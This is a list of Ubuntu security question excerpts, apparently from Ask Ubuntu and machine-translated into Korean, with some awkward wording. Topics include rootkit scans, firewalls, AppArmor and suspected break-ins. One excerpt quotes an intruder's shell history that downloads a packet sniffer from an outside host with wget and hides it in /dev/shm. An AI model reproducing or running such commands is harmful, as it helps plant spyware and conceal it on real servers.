«security» 태그된 질문

나는 꽤 오랫동안 리눅스를 사용하고 있었고 항상 스캔이나 로그인 시도 실패와 같은 의심스러운 네트워크 활동을 이메일이나 이메일로 알려줄 수있는 수동 소프트웨어 / 스크립트 설정이 항상 필요하다고 느낀다. 시각 / 음성 알림. 나는 로그와 물건을 찾는 방법을 알고 있지만 대부분은 수동적이고 시간이 많이 걸리는 프로세스입니다. 좋은 로그 파싱 기능으로 반 / …

27 software-recommendation  security  firewall  logs 

Ubuntu에 대한 무료 VPN 제공 업체를 찾을 수 없습니다. 나는 오래된 질문을 살펴 보았지만 구식 인 것 같습니다.

27 security  vpn  privacy 

나는 최근에 멋진 작은 하드웨어 2 단계 인증 장치 인 Yubikey Neo를 인수했습니다. 기본적으로 일회용 암호 및 새로 등장한 U2F 프로토콜과 함께 사용하도록 설계되었지만 Yubikey 버전 2부터는 HMAC-SHA1 챌린지 응답 인증도 지원합니다. HMAC-SHA1은 비밀 키 (Yubikey 내부에 저장 됨)를 결합하고이를 암호문과 결합하여 응답을 생성합니다. Yubikey를 Ubuntu FDE 설정과 결합하여 암호화 …

27 password  security  encryption  luks  yubikey 

회사 정책에 따르면 Linux 상자는 SELinux로 보안을 유지해야합니다 (보안 감사자는 각 서버에 대해 '예, 우리는 매우 안전합니다!'확인란을 선택할 수 있습니다). 우분투의 멋진 기본 AppArmor 보안을 활용하고 싶었습니다. Apparmor와 SELinux를 모두 실행하는 것이 현명하지 않습니까? (그렇다면이 나쁜 생각을 일부 의복 및 / 또는 selinux 조정으로 완화 할 수 있습니까?)

27 security  permissions  apparmor 

개인 컴퓨터의 시스템에 침투 한 것으로 99.9 % 확신합니다. 상황을 분명히하기 위해 먼저 내 추론을하도록하겠습니다. 의심스러운 활동 및 후속 조치에 대한 대략적인 타임 라인 : 4-26 23:00 모든 프로그램을 끝내고 랩톱을 닫았습니다. 4-27 12:00 노트북을 약 13 시간 동안 일시 중단 모드로 전환 한 후 열었습니다. 두 개의 크롬 창, …

25 ssh  security  passwd-file 

chkrootkit으로 스캔하면 "tcpd"가 INFECTED로 표시됩니다. rkhunter의 스캔 결과가 정상적으로 표시되지만 (정규 오 탐지 제외) 걱정 할까? (나는 4.8.0-37-generic으로 우분투 16.10에 있습니다)

25 security  malware  rootkit  tcpdump  chkrootkit 

나는 sudo는 암호가 로컬에 물리적으로 접근 가진 누군가에 의해 해킹으로부터 컴퓨터를 보호하는 것을 알고있다 ( 편집 : 실제로, 그것은 하지 않습니다 ). 내 암호는 그 목적을 위해 충분히 강력하지만 누군가가 원격으로 무차별 암호를 입력 할 수 있다면 충분히 강력하지 않다는 것을 알고 있습니다. 캔 사람의 접근 표준 우분투 데스크탑 설치에있는 …

25 password  sudo  security 

99 %의 사용자와 마찬가지로 기성품 바이너리에서 Ubuntu를 설치합니다. 이 바이너리가 실제로 Ubuntu의 원래 소스 코드에서 온 것인지 어떻게 확인할 수 있습니까? NSA / 누군가가 이진 파일을 망치기 위해 Ubuntu 또는 Linode (내 VPS 공급자)와 협력하지 않았는지 확인하는 것이 좋습니다. 바이너리를 검증 할 수 있다면, 그것들을 쉽게 불러 낼 수 있기 …

25 security 

우분투에는 사전 설치된 방화벽이나 자동 방화벽이 있습니까? 그렇지 않다면 필요합니까? 보안에 대해 다른 운영 체제보다 Linux의 장점에 대한 기사를 읽었지만 (바이러스 백신이 필요하지 않습니다 ...) 확실합니다.

25 security  firewall 

우분투 10.04.1 LTS를 실행 중입니다. 루트킷을 확인하기 위해 rkhunter 를 실행 하고 있습니다. rkhunter는 다음과 같은 숨겨진 파일과 디렉토리에 대해 불평하고 있습니다. 이 파일은 시스템에서 실제로 문제가되지 않는다고 생각하지만 이러한 파일이 합법적 인 파일인지 어떻게 확인할 수 있습니까? [07:57:45] Checking for hidden files and directories [ Warning ] [07:57:45] Warning: …

25 10.04  security  rkhunter 

어제 VServer에서 명령 기록을 확인했습니다. 의심스러운 줄이 여러 개 발견되었습니다. 195 wget aridan.hol.es/sniffer.tgz 196 tar xvf sniffer.tgz 197 ls -a 198 rm -rf sniffer.tgz 199 rm -rf .sniff/ 200 cd /dev/shm 201 ls -a 202 mkdir " . " 203 ls -a 204 cd " . "/ 205 wget aridan.hol.es/sniffer.tgz …

24 ssh  security  malware 

나는 do-release-upgrade우분투가 다음 봄 또는 가을 우분투 릴리스로 업그레이드하도록 프롬프트하는 방식 을 이해하려고합니다 . 소스를 읽은 후 시스템 ubuntu-release-upgrader에서 / etc / update-manager / meta-release 파일을 찾았습니다 . 이 파일은 HTTP URL을 사용하여 http://changelogs.ubuntu.com/meta-release 를 가리키며 Warty 04.10에서 Raring 13.04까지 다양한 Ubuntu 릴리스가 나열되어 있습니다. 이 파일에는 릴리스, 지원 상태, …

24 security  do-release-upgrade 

대답에 대답하려는 몇 가지 질문 : 의류가 돌아가고 있는지 어떻게 알 수 있습니까? 제대로 작동하는지 어떻게 알 수 있습니까?

24 security  apparmor 

악성 코드가 Linux 시스템에 침입 한 경우, 대부분 사용자 수준의 권한을 얻어 특정 사용자의 접근 범위 (예 : 사용자 자신의 파일) 내의 모든 내용을 망칠 수 있음을 이해합니다. 그러나 맬웨어가 루트 수준 액세스 권한을 얻지 못하는 이유는 무엇입니까? 어떻게 든 내부에서 암호를 해독 할 수 없습니까?

24 security 

RedHat / CentOS 시스템에서 rpm -V를 사용하여 시스템에 설치된 RPM을 확인할 수 있습니다 . apt이 명령 의 우분투 또는 이에 상응 하는 것은 무엇입니까 ?

24 security  apt  rpm  deb